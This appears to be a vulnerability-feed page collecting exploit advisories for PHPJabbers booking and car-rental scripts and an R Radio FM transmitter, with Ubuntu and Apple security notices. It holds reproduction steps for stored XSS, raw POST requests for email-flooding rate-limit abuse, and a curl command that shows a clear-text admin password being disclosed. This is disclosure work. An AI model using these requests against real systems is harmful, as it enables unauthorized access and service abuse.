PHPJabbers Car Rental version 3.0 suffers from an html injection vulnerability.

    # Exploit Title: PHPJabbers Car Rental v3.0 - HTML Injection# Date: 19/11/2023# Exploit Author: BugsBD Limited# Discover by: Rahad Chowdhury# Vendor Homepage: https://www.phpjabbers.com/# Software Link: https://www.phpjabbers.com/car-rental-script/# Version: v3.0# Tested on: Windows 10, Windows 11, Linux# CVE-2023-48837Descriptions:PHPJabbers Car Rental v3.0 is vulnerable to HTMl Injection. HTMLinjection, also known as HTML code injection or cross-site scripting(XSS), is a web security vulnerability that allows an attacker toinject malicious code into a web page that is then viewed by otherusers. This can lead to various attacks, such as stealing sensitiveinformation, session hijacking, defacement of websites, or deliveringmalware to users.Steps to Reproduce:1. Login your panel.2. Go to System Menu then click SMS Settings.3. Then use any HTML Tag in "SMS API Key", "Default Country Code"input field and Save.4. You will see HTML code working here.## Reproduce:[href](https://github.com/bugsbd/CVE/tree/main/2023/CVE-2023-48837)

PHPJabbers Car Rental 3.0 HTML Injection

Ubuntu Security Notice 6509-2 - USN-6509-1 fixed vulnerabilities in Firefox. The update introduced several minor regressions. This update fixes the problem. Multiple security issues were discovered in Firefox. If a user were tricked into opening a specially crafted website, an attacker could potentially exploit these to cause a denial of service, obtain sensitive information across domains, or execute arbitrary code. It was discovered that Firefox did not properly manage memory when images were created on the canvas element. An attacker could potentially exploit this issue to obtain sensitive information. It discovered that Firefox incorrectly handled certain memory when using a MessagePort. An attacker could potentially exploit this issue to cause a denial of service. It discovered that Firefox incorrectly did not properly manage ownership in ReadableByteStreams. An attacker could potentially exploit this issue to cause a denial of service. It discovered that Firefox incorrectly did not properly manage copy operations when using Selection API in X11. An attacker could potentially exploit this issue to obtain sensitive information. Rachmat Abdul Rokhim discovered incorrectly handled parsing of relative URLS starting with "///". An attacker could potentially exploit this issue to cause a denial of service.

==========================================================================  
Ubuntu Security Notice USN-6509-2  
December 04, 2023

firefox regressions  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 20.04 LTS

Summary:

USN-6509-1 caused some minor regressions in Firefox.

Software Description:  
- firefox: Mozilla Open Source web browser

Details:

USN-6509-1 fixed vulnerabilities in Firefox. The update introduced  
several minor regressions. This update fixes the problem.

We apologize for the inconvenience.

Original advisory details:

  Multiple security issues were discovered in Firefox. If a user were  
  tricked into opening a specially crafted website, an attacker could  
  potentially exploit these to cause a denial of service, obtain sensitive  
  information across domains, or execute arbitrary code. (CVE-2023-6206,  
  CVE-2023-6210, CVE-2023-6211, CVE-2023-6212, CVE-2023-6213)

    It was discovered that Firefox did not properly manage memory when  
  images were created on the canvas element. An attacker could potentially  
  exploit this issue to obtain sensitive information. (CVE-2023-6204)

    It discovered that Firefox incorrectly handled certain memory when using a  
  MessagePort. An attacker could potentially exploit this issue to cause a  
  denial of service. (CVE-2023-6205)

    It discovered that Firefox incorrectly did not properly manage ownership  
  in ReadableByteStreams. An attacker could potentially exploit this issue  
  to cause a denial of service. (CVE-2023-6207)

    It discovered that Firefox incorrectly did not properly manage copy  
  operations when using Selection API in X11. An attacker could potentially  
  exploit this issue to obtain sensitive information. (CVE-2023-6208)

    Rachmat Abdul Rokhim discovered incorrectly handled parsing of relative  
  URLS starting with "///". An attacker could potentially exploit this issue  
  to cause a denial of service. (CVE-2023-6209)

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 20.04 LTS:  
   firefox                         120.0.1+build1-0ubuntu0.20.04.1

After a standard system update you need to restart Firefox to make all the  
necessary changes.

References:  
   https://ubuntu.com/security/notices/USN-6509-2  
   https://ubuntu.com/security/notices/USN-6509-1  
   https://launchpad.net/bugs/2045518

Package Information:  
   https://launchpad.net/ubuntu/+source/firefox/120.0.1+build1-0ubuntu0.20.04.1

Ubuntu Security Notice USN-6509-2

PHPJabbers Car Rental version 3.0 suffers from multiple persistent cross site scripting vulnerabilities.

    # Exploit Title: PHPJabbers Car Rental v3.0 - Multiple Stored XSS# Date: 19/11/2023# Exploit Author: BugsBD Limited# Discover by: Rahad Chowdhury# Vendor Homepage: https://www.phpjabbers.com/# Software Link: https://www.phpjabbers.com/car-rental-script/# Version: v3.0# Tested on: Windows 10, Windows 11, Linux# CVE-2023-48836Descriptions:PHPJabbers Car Rental v3.0 is vulnerable to Multiple Stored Cross-SiteScripting. Multiple Stored XSS is a type of security vulnerabilitythat occurs when an application or website allows an attacker toinject malicious scripts into the content that is permanently storedon the server. Unlike reflected XSS, where the malicious script isembedded in a URL and executed immediately, stored XSS involves thepersistent storage of the malicious script on the target server,waiting for unsuspecting users to access the compromised content.Steps to Reproduce:1. Login your panel.2. Vulnerable parameters are "name, plugin_sms_api_key,plugin_sms_country_code, calendar_id, title, country name,customer_name".3. Go to System Menu then click SMS Settings.4. Then use any XSS Payload in "SMS API Key", "Default Country Code"input field and Save.5. You will see popup.## Reproduce:[href](https://github.com/bugsbd/CVE/tree/main/2023/CVE-2023-48836)

PHPJabbers Car Rental 3.0 Cross Site Scripting

R Radio Network FM Transmitter version 1.07 suffers from an improper access control that allows an unauthenticated actor to directly reference the system.cgi endpoint and disclose the clear-text password of the admin user allowing authentication bypass and FM station setup access.

    R Radio Network FM Transmitter 1.07 system.cgi Password DisclosureVendor: R Radio NetworkProduct web page: http://www.pktc.ac.thAffected version: 1.07Summary: R Radio FM Transmitter that includes FM Exciter andFM Amplifier parameter setup.Desc: The transmitter suffers from an improper access controlthat allows an unauthenticated actor to directly reference thesystem.cgi endpoint and disclose the clear-text password of theadmin user allowing authentication bypass and FM station setupaccess.Tested on: CSBtechDeviceVulnerability discovered by Gjoko 'LiquidWorm' Krstic                            @zeroscienceAdvisory ID: ZSL-2023-5802Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5802.php09.10.2023--$ curl -s http://192.168.70.12/system.cgi<html><head><title>System Settings</title>......Password for user 'admin'</td><td><input type=password name=pw size=10 maxlength=10 value="testingus"></td>......$

R Radio Network FM Transmitter 1.07 system.cgi Password Disclosure

PHPJabbers Car Rental version 3.0 suffers from a missing rate limiting control that can allow for resource exhaustion.

    # Exploit Title: PHPJabbers Car Rental v3.0 - No Rate Limit in Email# Date: 19/11/2023# Exploit Author: BugsBD Limited# Discover by: Rahad Chowdhury# Vendor Homepage: https://www.phpjabbers.com/# Software Link: https://www.phpjabbers.com/car-rental-script/# Version: v3.0# Tested on: Windows 10, Windows 11, Linux# CVE-2023-48834Descriptions:Rate limiting is implemented in web applications and APIs to preventabuse, such as brute-force attacks or excessive requests that couldlead to resource exhaustion. When a rate limit is bypassed or notproperly enforced, it opens the door for attackers to carry outmalicious activities more quickly than intended, potentially leadingto unauthorized access, data breaches, or service disruption.Steps to Reproduce:1. Request Data:POST /1701528105_124/index.php?controller=pjBaseOptions&action=pjActionAjaxSendHTTP/1.1Host: demo.phpjabbers.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0)Gecko/20100101 Firefox/119.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brContent-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestContent-Length: 502Origin: https://demo.phpjabbers.comReferer: https://demo.phpjabbers.com/1701528105_124/index.php?controller=pjBaseOptions&action=pjActionEmailSettings&err=PBS03Sec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: same-originTe: trailersConnection: closeoptions_update=1&next_action=pjActionEmailSettings&email=test1%40test.com&value-enum-o_send_email=mail%7Csmtp%3A%3Amail&value-string-o_smtp_host=&value-int-o_smtp_port=25&value-string-o_smtp_user=&value-string-o_smtp_pass=&value-enum-o_smtp_secure=none%7Cssl%7Ctls%3A%3Anone&value-enum-o_smtp_auth=LOGIN%7CPLAIN%3A%3ALOGIN&o_smtp_seder_email_same_as_username=on&value-enum-o_smtp_seder_email_same_as_username=Yes%7CNo%3A%3AYes&value-string-o_sender_email=test%40test.com&value-string-o_sender_name=Test2. Send it to intruder and configure then attack.## Reproduce:[href](https://github.com/bugsbd/CVE/tree/main/2023/CVE-2023-48834)

PHPJabbers Car Rental 3.0 Missing Rate Limit

PHPJabbers Time Slots Booking Calendar version 4.0 suffers from a missing rate limiting control that can allow for resource exhaustion.

    # Exploit Title: PHPJabbers Time Slots Booking Calendar v4.0 - No RateLimit in Email# Date: 19/11/2023# Exploit Author: BugsBD Limited# Discover by: Rahad Chowdhury# Vendor Homepage: https://www.phpjabbers.com/# Software Link: https://www.phpjabbers.com/time-slots-booking-calendar/# Version: v4.0# Tested on: Windows 10, Windows 11, Linux# CVE-2023-48833Descriptions:Rate limiting is implemented in web applications and APIs to preventabuse, such as brute-force attacks or excessive requests that couldlead to resource exhaustion. When a rate limit is bypassed or notproperly enforced, it opens the door for attackers to carry outmalicious activities more quickly than intended, potentially leadingto unauthorized access, data breaches, or service disruption.Steps to Reproduce:1. Request Data:POST /1701527883_624/index.php?controller=pjBaseOptions&action=pjActionAjaxSendHTTP/1.1Host: demo.phpjabbers.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0)Gecko/20100101 Firefox/119.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brContent-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestContent-Length: 502Sec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: same-originTe: trailersConnection: closeoptions_update=1&next_action=pjActionEmailSettings&email=test1%40test.com&value-enum-o_send_email=mail%7Csmtp%3A%3Amail&value-string-o_smtp_host=&value-int-o_smtp_port=25&value-string-o_smtp_user=&value-string-o_smtp_pass=&value-enum-o_smtp_secure=none%7Cssl%7Ctls%3A%3Anone&value-enum-o_smtp_auth=LOGIN%7CPLAIN%3A%3ALOGIN&o_smtp_seder_email_same_as_username=on&value-enum-o_smtp_seder_email_same_as_username=Yes%7CNo%3A%3AYes&value-string-o_sender_email=test%40test.com&value-string-o_sender_name=Test2. Send it to intruder and configure then attack.## Reproduce:[href](https://github.com/bugsbd/CVE/tree/main/2023/CVE-2023-48833)

PHPJabbers Time Slots Booking Calendar 4.0 Missing Rate Limiting

PHPJabbers Availability Booking Calendar version 5.0 suffers from a missing rate limiting control that can allow for resource exhaustion.

    # Exploit Title: PHPJabbers Availability Booking Calendar v5.0 - NoRate Limit in Email# Date: 19/11/2023# Exploit Author: BugsBD Limited# Discover by: Rahad Chowdhury# Vendor Homepage: https://www.phpjabbers.com/# Software Link:https://www.phpjabbers.com/availability-booking-calendar/#sectionDemo# Version: v5.0# Tested on: Windows 10, Windows 11, Linux# CVE-2023-48831Descriptions:Rate limiting is implemented in web applications and APIs to preventabuse, such as brute-force attacks or excessive requests that couldlead to resource exhaustion. When a rate limit is bypassed or notproperly enforced, it opens the door for attackers to carry outmalicious activities more quickly than intended, potentially leadingto unauthorized access, data breaches, or service disruption.Steps to Reproduce:1. Request Data:POST /1701526313_862/index.php?controller=pjBaseOptions&action=pjActionAjaxSendHTTP/1.1Host: localhostCookie: _ga=GA1.2.1947184974.1699512498;_fbp=fb.1.1699512498084.844079488;_ga_NME5VTTGTT=GS1.2.1701527599.5.1.1701527608.51.0.0;_gcl_au=1.1.1109346785.1700383352;_hjSessionUser_2841064=eyJpZCI6ImVlNjRmZTlkLTlmMDAtNWJmMC05OTk1LWE4ODQzMmNiMGQ0OSIsImNyZWF0ZWQiOjE3MDAzODMzNTQyMDYsImV4aXN0aW5nIjp0cnVlfQ==;pj_sid=PJ1.0.3350592650.1700383356; pj_so=PJ1.0.9822262006.1700383356;CarRental=pb6krbqhp0ugdgduc39iagulp2; pjd=fmfk4mh95jvo519v16tcbmfte4;PHPSESSID=91h58pp95vek8qpp4jj62srb23;ShuttleBooking=uhei7cs26l7eoen1bfja4ciaq2;TSBCalendar=k2502gveirj5nhpo9ofnbpnrv2;ABCalendar=lkoj2qi9cq5dib87qothkc9d77;_gid=GA1.2.1184409840.1701527598; _gat=1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0)Gecko/20100101 Firefox/119.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brContent-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestContent-Length: 502Sec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: same-originTe: trailersConnection: closeoptions_update=1&next_action=pjActionEmailSettings&email=test1%40test.com&value-enum-o_send_email=mail%7Csmtp%3A%3Amail&value-string-o_smtp_host=&value-int-o_smtp_port=25&value-string-o_smtp_user=&value-string-o_smtp_pass=&value-enum-o_smtp_secure=none%7Cssl%7Ctls%3A%3Anone&value-enum-o_smtp_auth=LOGIN%7CPLAIN%3A%3ALOGIN&o_smtp_seder_email_same_as_username=on&value-enum-o_smtp_seder_email_same_as_username=Yes%7CNo%3A%3AYes&value-string-o_sender_email=test%40test.com&value-string-o_sender_name=Test2. Send it to intruder and configure then attack.## Reproduce:[href](https://github.com/bugsbd/CVE/tree/main/2023/CVE-2023-48831)

PHPJabbers Availability Booking Calendar 5.0 Missing Rate Limiting

PHPJabbers Time Slots Booking Calendar version 4.0 suffers from multiple persistent cross site scripting vulnerabilities.

    # Exploit Title: PHPJabbers Time Slots Booking Calendar v4.0 -Multiple Stored XSS# Date: 13/11/2023# Exploit Author: BugsBD Limited# Discover by: Rahad Chowdhury# Vendor Homepage: https://www.phpjabbers.com/# Software Link: https://www.phpjabbers.com/time-slots-booking-calendar/# Version: v4.0# Tested on: Windows 10, Windows 11, Linux# CVE-2023-48828Descriptions:Multiple Stored Cross-Site Scripting (XSS) is a type of securityvulnerability that occurs when an application or website allows anattacker to inject malicious scripts into the content that ispermanently stored on the server. Unlike reflected XSS, where themalicious script is embedded in a URL and executed immediately, storedXSS involves the persistent storage of the malicious script on thetarget server, waiting for unsuspecting users to access thecompromised content.Steps to Reproduce:1. Login your panel2. Vulnerable parameters are "name, plugin_sms_api_key,plugin_sms_country_code, calendar_id, title, country name,customer_name".3. Go to System Menu then click SMS Settings.4. Then use any XSS Payload in "SMS API Key", "Default Country Code"input field and Save.5. You will see popup.## Reproduce:[href](https://github.com/bugsbd/CVE/tree/main/2023/CVE-2023-48828)

PHPJabbers Time Slots Booking Calendar 4.0 Cross Site Scripting

Apple has released an emergency security update for two zero-day vulnerabilities which may have already been exploited.

Apple has released emergency security updates for iOS 17.1.2 and iPadOS 17.1.2 to patch for two zero-day vulnerabilities that may have been actively exploited.

Apple said both vulnerabilities were in the WebKit component, which is the engine that powers Safari browser on Macs as well as all browsers on iPhones and iPads. It is also the web browser engine used by Mail, App Store, and many other apps on macOS, iOS, and Linux.

The updates are available for the following:

*   iPhone XS and later
*   iPad Pro 12.9-inch 2nd generation and later
*   iPad Pro 10.5-inch
*   iPad Pro 11-inch 1st generation and later
*   iPad Air 3rd generation and later
*   iPad 6th generation and later
*   iPad mini 5th generation and later.
*   macOS Sonoma 14.1.2
*   Safari 17.1.2.

The updates may already have reached you if you automatically update, but it doesn’t hurt to check if your device is at the latest update level.

If a Safari update is available for your device, you can get it by updating your iPhone or iPad or updating your Mac.

**We don’t just report on threats—we remove them**

Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.

 Update your iPhones! Apple fixes two zero-days in iOS 

PHPJabbers Time Slots Booking Calendar version 4.0 suffers from an html injection vulnerability.

    # Exploit Title: PHPJabbers Time Slots Booking Calendar v4.0 - HTML Injection# Date: 13/11/2023# Exploit Author: BugsBD Limited# Discover by: Rahad Chowdhury# Vendor Homepage: https://www.phpjabbers.com/# Software Link: https://www.phpjabbers.com/time-slots-booking-calendar/# Version: v4.0# Tested on: Windows 10, Windows 11, Linux# CVE-2023-48827Descriptions:HTML injection, also known as HTML code injection or cross-sitescripting (XSS), is a web security vulnerability that allows anattacker to inject malicious code into a web page that is then viewedby other users. This can lead to various attacks, such as stealingsensitive information, session hijacking, defacement of websites, ordelivering malware to users.Steps to Reproduce:1. Login your panel2. "name, plugin_sms_api_key, plugin_sms_country_code, calendar_id,title, country name, customer_name" parameters are vulnerable to htmlinjection.3. Go to System Menu then click SMS Settings.4. Then use any HTML Tag in "SMS API Key", "Default Country Code"input field and Save.5. You will see HTML code working here.## Reproduce:[href](https://github.com/bugsbd/CVE/tree/main/2023/CVE-2023-48827)

Tag

#web